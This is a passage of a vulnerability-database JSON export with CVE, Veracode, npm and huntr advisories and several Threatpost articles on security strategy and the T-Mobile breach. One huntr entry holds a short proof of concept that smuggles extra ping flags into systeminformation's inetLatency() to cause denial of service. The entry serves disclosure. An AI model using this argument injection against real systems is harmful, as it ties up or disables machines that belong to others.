7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-10-21T15:15:00", "type": "cve", "title": "CVE-2020-14864", "cwe": ["CWE-22"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.8, "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-14864"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/a:oracle:business_intelligence:12.2.1.3.0", "cpe:/a:oracle:business_intelligence:5.5.0.0.0", "cpe:/a:oracle:business_intelligence:12.2.1.4.0"], "id": "CVE-2020-14864", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2020-14864", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:C/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:business_intelligence:12.2.1.3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:12.2.1.4.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:oracle:business_intelligence:5.5.0.0.0:*:*:*:enterprise:*:*:*"]}], "veracode": [{"lastseen": "2023-04-18T12:21:41", "description": "apache-airflow is vulnerable to remote code execution (RCE). The vulnerability exists as the example DAGs does not properly sanitize the value of `dag_run.conf[\"message\"]`. The vulnerability exists if examples are enabled when the `load_examples=True` is present in the config.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-07-20T07:24:23", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-11978"], "modified": "2022-07-13T12:56:56", "id": "VERACODE:25916", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-25916/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:43:05", "description": "systeminformation is vulnerable to OS command injection. An attacker is able to inject and execute arbitrary OS commands via service parameters that are passed to `si.inetLatency()`, `si.inetChecksite()`, `si.services()`, `si.processLoad()` etc.\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-17T03:15:26", "type": "veracode", "title": "OS Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-03-25T21:01:32", "id": "VERACODE:29414", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-29414/summary", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-04-18T12:21:09", "description": "drupal/core-recommended is vulnerable to Remote Code Execution. The attacker is able to inject malicious code through unsanitized filename on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T13:22:25", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T19:14:07", "id": "VERACODE:27960", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27960/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2022-07-26T16:28:04", "description": "drupal is vulnerable to remote code execution (RCE). The vulnerability exists as it does not properly sanitize certain filenames on uploaded files, which can lead to files being interpreted as the incorrect extension and served as the wrong MIME type or executed as PHP for certain hosting configurations.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-11-20T09:24:06", "type": "veracode", "title": "Remote Code Execution (RCE)", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-13671"], "modified": "2022-01-01T19:14:07", "id": "VERACODE:27939", "href": "https://sca.analysiscenter.veracode.com/vulnerability-database/security/1/1/sid-27939/summary", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "nodejs": [{"lastseen": "2021-07-28T14:37:03", "description": "## Overview\n\nThe `systeminformation` package is an open source collection of functions to retrieve detailed hardware, system and OS information. In affected versions of `systeminformation` there is a command injection vulnerability.\n\nAs a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to `si.inetLatency()`, `si.inetChecksite()`, `si.services()`, `si.processLoad()` ... do only allow strings, reject any arrays. String sanitation works as expected.\n\n## Recommendation\n\nUpgrade to version 5.3.1 or later\n\n## References\n\n- [GitHub Advisory](https://github.com/advisories/GHSA-2m8v-572m-ff2v)\n- [CVE](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21315)", "edition": 1, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-02-24T03:24:56", "type": "nodejs", "title": "Command Injection", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-24T03:24:56", "id": "NODEJS:1628", "href": "https://www.npmjs.com/advisories/1628", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "huntr": [{"lastseen": "2023-05-27T15:16:43", "description": "# Description\n\n`systeminformation` is vulnerable to Denial of Service.\n\nIt is possible to overwrite the ping command parameters, which results in too long execution.\n\n# Proof of Concept\n\nCreate a .js file with the content below and run it.\n\n```javascript\nconst si = require('systeminformation');\nsi.inetLatency(\"-c 10000000000 -w 999999999 effectrenan.com\").then((a) => { console.log(a) })\n```\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-11T00:00:00", "type": "huntr", "title": "Denial of Service in sebhildebrandt/systeminformation", "bulletinFamily": "bugbounty", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-21315"], "modified": "2021-02-14T10:59:07", "id": "1-NPM-SYSTEMINFORMATION", "href": "https://www.huntr.dev/bounties/1-npm-systeminformation/", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}], "threatpost": [{"lastseen": "2021-08-30T18:54:52", "description": "If you ask organizations about their top objectives, you will likely hear they need to increase visibility, reduce toolsets and adopt automation to counteract the cybersecurity skills gap. And what most don\u2019t realize is that these initiatives are driven by hurdles the industry has created for itself.\n\nCountless hours are spent trying to overcome hurdles in a process that doesn\u2019t get us any closer to thwarting threat actors. Consolidating tools, for example, is just a preservation tactic \u2014 therein lies the problem. So, how can security professionals stop using Band-Aids and reevaluate what\u2019s really going on and how to defend against threats?\n\n## **Understand the Race, Focus on the Finish Line**\n\nThe _race_ we\u2019re running is to develop cyber-defenses that prevent harmful impacts from attacks. The severity of those impacts differs wildly \u2014 from disrupted customer service to reputational damage from stolen data, and multifaceted extortion to regulatory fines. Thus, security teams often place focus on the race itself and forget about the actual goal or _finish line_.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThis is often shown when looking at a security function\u2019s mission statement, which typically highlights the lack of \u201cso what?\u201d and connection to the business. For example: \u201cOur mission is to continuously improve the organization\u2019s security posture by preventing, detecting, analyzing and responding to cybersecurity incidents.\u201d It is missing the finish line.\n\nThe _finish line_ is the business\u2019 ability to continue to operate in the face of threats.\n\n## **Increasing Visibility Is Not the Starting Line**\n\nWhen I speak with security leaders, most say that visibility is the starting line for the success of their program. It is not. Increased visibility is needed because poorly configured systems and poor network hygiene require collection of massive amounts of data for threat monitoring. Yes, visibility is vitally important to enable threat monitoring; however, collecting a trove of data is not going to solve problems and will add to them if not part of a larger plan.\n\nVisibility does not drive action. It can enable execution, but it is not the trigger.\n\n## **Intelligence is the Starting Line, and the Power Behind the Racer**\n\nThreat intelligence provides critical information on the cyber-landscape and active adversaries that shape threat profiles and unveil vulnerabilities in an organization, along with the likelihood of compromise and its potential impact to the business.\n\nUnfortunately, organizations don\u2019t know what to do with threat intelligence once they have it. It\u2019s seen as another feed into a SIEM that provides CVE information. Intelligence must be operationalized throughout cyber-defense operations to drive action and inform decision-making.\n\nThe orchestration of how this is done is driven by a command-and-control (C2) function to ensure communication is flowing properly to increase effectiveness of cyber defenses and reduce duplicate efforts.\n\nC2 functions can activate intelligence by:\n\n * Triggering hunt activities. A hunt team should use information about active APT groups and the latest relevant breaches to **identify active or past compromise**.\n * Prioritizing vulnerabilities based on the likelihood and impact of compromise. IT and Security groups use this to **inform patch and upgrade priorities**.\n * Informing security engineering teams what types of monitoring need to be in place to **alert on activities tied to active APT groups** (not just CVEs).\n * Prompting security operations groups to **refresh playbooks to handle updated alerts**.\n * Providing context around breaches so that incident responders can **rapidly contain a breach and prevent repeat compromise**.\n\nIntelligence is used to drive all actions of cyber-defense. With proper intelligence, organizations can: (1) understand what actions need to be taken, (2) identify the level of visibility needed, and (3) then determine what tools are needed to fully operationalize this intelligence.\n\n## **Fight the Desire to Start with Tooling**\n\nThere is a deep-rooted force within the cybersecurity industry to buy shiny new tools that promise to solve all problems. Tool-buying fads have come and gone (remember when [HIDS and WIDS](<https://www.neovera.com/hids-nids-wids/>) were a thing?) Believing that shiny new tools are going to be the silver bullet against attackers is like thinking new shoes will win the race for you. Tools don\u2019t provide value unless properly activated and coordinated with other cyber-defense functions.\n\n## **Don\u2019t Forget About the Racer**\n\nNow that we understand the race, we have new shoes, are standing at the starting line and know where to find the finish line, now we can activate the racer. Okay, maybe this metaphor has been taken a little too far \u2014 but in the spirit of breaking things down to build them back up, let\u2019s not forget about the fitness of the racer: The architectures, the tools and the users that make up organizations. This means exercising good hygiene, implementing resilient architectures and practicing secure coding practices.\n\n## **So What?**\n\nOrganizational planning for security often focuses on hurdles created by the industry, not the harmful threat actors in play. There are many disparate technologies that put immense effort towards consolidating tools \u2014 effort that should be spent fighting threats. The root of the security skills gap hurdle is not due to untrained experts on the frontlines, but because the industry has aged in a way that requires people to solve problems, which is unscalable.\n\nWhatever hurdles the industry faces (and creates for itself), knowing where the starting line is, focusing on the finish line and using threat intelligence as the power behind the runner provides the best chance of winning the race.\n\n**_Kerry Matre is senior director at Mandiant._**\n\n_**Enjoy additional insights from Threatpost\u2019s Infosec Insiders community by **_[**_visiting our microsite_**](<https://threatpost.com/microsite/infosec-insiders-community/>)_**.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T20:16:34", "type": "threatpost", "title": "Winning the Cyber-Defense Race: Understand the Finish Line", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T20:16:34", "id": "THREATPOST:B5F8CA0AF4F98DBE9E38860BC10035DE", "href": "https://threatpost.com/winning-cyber-defense-race/168996/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:56:21", "description": "The [CVE database](<https://www.cvedetails.com/vulnerabilities-by-types.php>) reported 18,325 vulnerabilities in 2020. To add to this, more than 40% of the vulnerabilities do not even have a CVE identifier assigned, and open vulnerabilities on organizations\u2019 infrastructure are the most widely exploited pain points for malicious attacks \u2013 including ransomware. The irony is that many organizations rely on periodic vulnerability assessment activities, like performing scans bi-weekly, monthly, or quarterly, but following this process can take months to complete, ultimately leaving a massive gap for attackers to exploit. This is an example of routine (but random) methodologies and processes invented to keep vulnerabilities in check, but will not protect IT networks. It is essential to assess key areas, identify necessary components, and build a robust and automated vulnerability management program to safeguard your network from the growing attack surface. To do that, below are some best practices to implement into your IT strategy for a robust vulnerability management program.\n\n## **A unified approach to both network and endpoint vulnerabilities**\n\nA vulnerability is classified as any loophole in your network that is exploitable. Modern attackers explore multiple angles to achieve their attack objectives, whether that\u2019s a nation-state actor looking to disrupt critical infrastructure or a cybergang looking to make a quick few million dollars. Focusing on one area and neglecting the other will easily create security gaps.\n\nFor example, traditional vulnerability management programs focus on remote scanning only and ignore vulnerabilities in the endpoints. With the changing work norms ushered in by the pandemic, endpoints have become an easy exploit target, and your vulnerability management program should give equal importance to managing both network and endpoint vulnerabilities. Many CISOs ignore software vulnerabilities considering them less critical to their security, but this opens gateways for attackers to intrude the network. Your vulnerability management program must manage vulnerabilities across all IP-enabled devices in your IT infrastructure.\n\n## **Continuous, ongoing and automated vulnerability assessment schedules**\n\nEvery day, numerous vulnerabilities are disclosed, and taking a periodic vulnerability assessment approach will not help you identify the most recent risks \u2013 it will actually keep you several steps behind in building security resilience. With the speed at which attackers can penetrate networks, a tiny gap is enough to execute an attack, and your vulnerability management process should be continuous and ongoing to avoid any unforeseen security risks. Opting for a solution that automates the vulnerability management routine will simplify the process and increase effectiveness.\n\n## **Speed and efficiency of vulnerability scanners**\n\nVulnerability scanning is the foremost step in your vulnerability management process. Slow vulnerability scanners create a lag, slow business processes, and act as a major pitfall for any vulnerability management program. These scanners hinder IT security teams from running continuous scans. Along with this, the vast number of false positives provided by vulnerability scanners makes the entire process even more ineffective. The vulnerability scanner you choose should be rapid, efficient, compatible with your network infrastructure, and provide close to zero false positives.\n\n## **Breadth and comprehensiveness of a vulnerability database**\n\nPerforming vulnerability scanning based on CVE data alone is inaccurate and leads to false reporting. Vulnerability scanners must rely on a comprehensive database or a repository of security checks that perform a deep analysis on each vulnerability. As a result, vulnerability databases play a vital role in the vulnerability management program, and the quality of the vulnerability database determines the accuracy of your vulnerability assessment data. Consider using a comprehensive vulnerability database with coverage to both network and endpoint vulnerabilities and is regularly updated to identify the most recent vulnerability in your network.\n\n## **Risk-based vulnerability analysis**\n\nTaking remediation efforts randomly without understanding the risks possessed by each vulnerability is not an intelligent approach to risk-based vulnerability analysis. Every IT infrastructure is unique and has varying risk levels based on access to the network, security tokens, and other elements. Your vulnerability assessment should focus on analyzing risk levels of all vulnerabilities and remediate the most critical ones first. Risk levels are calculated by considering various factors like threat intelligence, public ratings of vulnerabilities, assets in the enterprise, current exploit activities, and many more organization-specific factors.\n\nAdditionally, a vulnerability assessment program should also meet the compliance standards set by regulatory agencies like HIPAA, PCI, NIST, and others.\n\n## **Vulnerability assessment must go beyond assessing only known vulnerabilities**\n\nYour security exposure analysis should go beyond assessing only known vulnerabilities. Crucial activities like misconfiguration assessment, asset exposure analysis, and monitoring security control deviations must be a part of your IT security checklist.\n\n## **Integrated patch remediation**\n\nThe most crucial step followed by vulnerability assessment is to remediate detected vulnerabilities. According to a recent [study](<https://securityboulevard.com/2019/10/60-of-breaches-in-2019-involved-unpatched-vulnerabilities/>), 60% of breaches involve vulnerabilities for which a patch was available but not applied on time. Patching helps security teams reduce the attack surface significantly and helps prevent attacks. Your vulnerability management program should be equipped with an integrated patch management tool to remediate vulnerabilities on time, and the patching process safeguards networks from an array of potential attacks.\n\n## **Extensive report catalog**\n\nTracking and monitoring the actions of your vulnerability management process will help you analyze what steps you need to take to adjust your IT security strategy. Insightful reports will help you review and evaluate your vulnerability management process and provide the necessary details of vulnerabilities in your network. Your vulnerability management program should offer an extensive range of reports for detailed study and analysis.\n\nKeeping in mind these key factors will help you evaluate your current vulnerability management program and guide you in making the necessary enhancements to your existing IT strategy. By implementing a robust, resilient, expansive, and automated vulnerability management program, you\u2019ll mitigate cyberattacks through minimizing vulnerability risk, ultimately protecting your company\u2019s and customers\u2019 information \u2013 and your reputation.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 3.6}, "published": "2021-08-27T13:00:36", "type": "threatpost", "title": "Top Strategies That Define the Success of a Modern Vulnerability Management Program", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-33766"], "modified": "2021-08-27T13:00:36", "id": "THREATPOST:DC1D0F0CCC185180A765DA70CBE07A9B", "href": "https://threatpost.com/top-strategies-that-define-the-success-of-a-modern-vulnerability-management-program/168604/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-08-30T18:56:02", "description": "On Thursday, a 21-year-old US citizen claiming to be the attacker who stole data on more than 50 million T-Mobile customers called the telecom\u2019s security \u201cawful.\u201d\n\nOn Friday, a \u201chumbled\u201d T-Mobile CEO Mike Sievert wiped the egg from his face and [apologized](<https://www.t-mobile.com/news/network/cyberattack-against-tmobile-and-our-customers>) for the debacle, the repercussions of which have affected a total of more than 50 million customers at this point. As of Aug. 18, T-Mobile had estimated the total number of ripped-off records to be [~40 million](<https://threatpost.com/t-mobile-40-million-customers-data-stolen/168778/>): a number that [rose to ~50 million](<https://www.t-mobile.com/news/network/additional-information-regarding-2021-cyberattack-investigation>) on Aug. 20 and could double if the purported thief is true to his word.\n\nWhen [the breach](<https://threatpost.com/t-mobile-investigates-100m-records/168689/>) was widely reported 11 days ago, the purported thief was offering to sell 30 million records for ~1 penny each on an underground forum: what he claimed was a subset of 100 million customer records. He alleged that he was going to sell the other 50 million privately. As of Thursday, he hadn\u2019t acknowledged having sold any of the records.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nThe [Wall Street Journal](<https://www.wsj.com/articles/t-mobile-hacker-who-stole-data-on-50-million-customers-their-security-is-awful-11629985105?mod=article_relatedinline>) has been chatting with the purported attacker via Telegram for a while. The news outlet has confirmed that his name is John Binns: a 21-year-old US citizen of Turkish descent who moved to Turkey a few years ago. Binns reportedly discussed details about the breach before they were widely known.\n\nThe WSJ noted that T-Mobile was initially notified of the breach by a cybersecurity company called [Unit221B LLC](<https://unit221b.com/>), which said that the telecom\u2019s customer data was being peddled on the dark web.\n\n## Who is John Binns?\n\nBinns told the WSJ that he conducted the attack from his home in Izmir, Turkey, where he lives with his mother. His father, who died when he was two, was American, while his mother is Turkish. They moved back to Turkey when Binns was 18.\n\nIf the name rings a bell, it\u2019s because the seller told Alon Gal, CTO of cybercrime intelligence firm [Hudson Rock](<https://www.hudsonrock.com/>), that this sucker-punch to US infrastructure was done in retaliation against the US for the kidnapping and torture of John Binns at the hands of CIA and Turkish intelligence agents in 2019, as Gal tweeted at the time (from an account that has since been suspended).\n\n> This breach was done to retaliate against the US for the kidnapping and torture of John Erin Binns (CIA Raven-1) in Germany by CIA and Turkish intelligence agents in 2019. We did it to harm US infrastructure. \u2014Attacker\u2019s alleged statement to Gal\n\nIt\u2019s not clear who \u201cwe\u201d refers to, but Binns said he needed help. In his conversation with the WSJ, Binns described the attack as a \u201ccollaborative effort to find the login credentials needed to crack T-Mobile\u2019s internal databases,\u201d and that another online actor offered, in online forums, to sell some of the stolen T-Mobile data.\n\nBinns [sued](<https://casetext.com/case/binns-v-cent-intelligence-agency>) the FBI, CIA and Department of Justice in 2020, alleging that he was tortured and harassed by the US and Turkish governments and is seeking to compel the US to release documents regarding these activities under the Freedom of Information Act. He told the WSJ that the kidnapping story is legitimate \u2013 why would he lie?:\n\n> I have no reason to make up a fake kidnapping story and I\u2019m hoping that someone within the FBI leaks information about that. \u2014John Binns, as quoted by the WSJ\n\nBinns reportedly uses the online handles IRDev and v0rtex, among others. He\u2019s apparently got a track record that includes \u201cperipheral involvement\u201d in the creation of a [massive botnet](<https://www.wsj.com/articles/web-attack-stemmed-from-game-tactics-1477256958?mod=article_inline>) of compromised devices that was used for online attacks four years ago, having been in cahoots with the gamers who infected devices around the world.\n\nThese botnets are often used by gamers to knock people and websites offline in distributed denial-of-service (DDoS) attacks. The [pandemic caused a surge](<https://threatpost.com/ddos-attacks-skyrocket-pandemic/159301/>) in such attacks: As of September 2020, more people were online during lockdowns and work-from-home shifts, making for lucrative pickings for DDoS-ers.\n\n## T-Mobile\u2019s \u2018Awful\u2019 Security\n\nBinns told the WSJ that he penetrated T-Mobile\u2019s defenses in July after scanning the company\u2019s known internet addresses, looking for weak spots and using what the publication called \u201ca simple tool available to the public.\u201d (That tool well might have been Shodan: a search engine used to uncover servers connected to the internet that\u2019s often used by threat actors and researchers to find vulnerabilities.)\n\nHe found an unprotected, exposed router last month, he told the Journal. From there, Binns said he managed to break into T-Mobile\u2019s data center outside East Wenatchee, Wash., where he reportedly accessed more than 100 servers that contained the personal data of millions. By Aug. 4, he had stolen millions of files thanks to what he told the Journal was the mobile phone seller\u2019s pathetic security:\n\n> I was panicking because I had access to something big. Their security is awful. \u2014John Binns, as quoted by the WSJ\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27170759/T-Mobile-screen-capture-e1630098497960.png>)\n\nBinns shared this screenshot of internal T-Mobile servers that displayed warnings against unauthorized access. \nSource: WSJ.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/08/27171327/personal-T-Mobile-customer-data.png>)\n\nTables of personal information that Binns told the WSJ that he found in T-Mobile\u2019s internal systems. Source: WSJ.\n\nCybersecurity experts have been nodding vigorously, albeit in more diplomatic terms than \u201cawful.\u201d The Journal spoke with Glenn Gerstell, a former general counsel for the National Security Agency, who said that the fact that the theft included records stolen from prospective clients or former, long-gone customers shows that somebody or somebodies at T-Mobile isn\u2019t practicing good data management hygiene: \u201cThat to me does not sound like good data management practices,\u201d he was quoted as saying.\n\nGranted, that work gets harder all the time. Randy Watkins, chief technology officer at cybersecurity consulting and managed detection and response (MDR) services company CRITICALSTART, told Threatpost on Friday that the attack shows how difficult it is to secure growing perimeters and how tough it is to monitor attack surfaces.\n\nWatkins warned that alerts set off by an intruder\u2019s activity \u2013 including initial compromise, subsequent lateral movement and data exfiltration\u2013 are dismissed at an organization\u2019s peril: \u201cEven if this generated alerts, they would likely be low-priority, and something that would be disregarded as a likely false-positive,\u201d he said via email. \u201cAs attackers take advantage of these less-obvious tactics, it is becoming more critical to resolve every alert generated by detection toolsets.\u201d\n\n## Something\u2019s Wrong in Magenta Land\n\nBy some accounts, this is the sixth time that T-Mobile has been attacked in recent years.\n\nThe US Federal Communications Commission (FCC) said last week that it\u2019s [investigating this most recent breach](<https://www.reuters.com/technology/hackers-steal-some-personal-data-about-78-mln-t-mobile-customers-2021-08-18/>). T-Mobile is also facing at least two [class-action lawsuits](<https://www.q13fox.com/news/t-mobile-hit-with-class-action-lawsuits-over-data-breach>) accusing the company, the second-largest US wireless carrier, 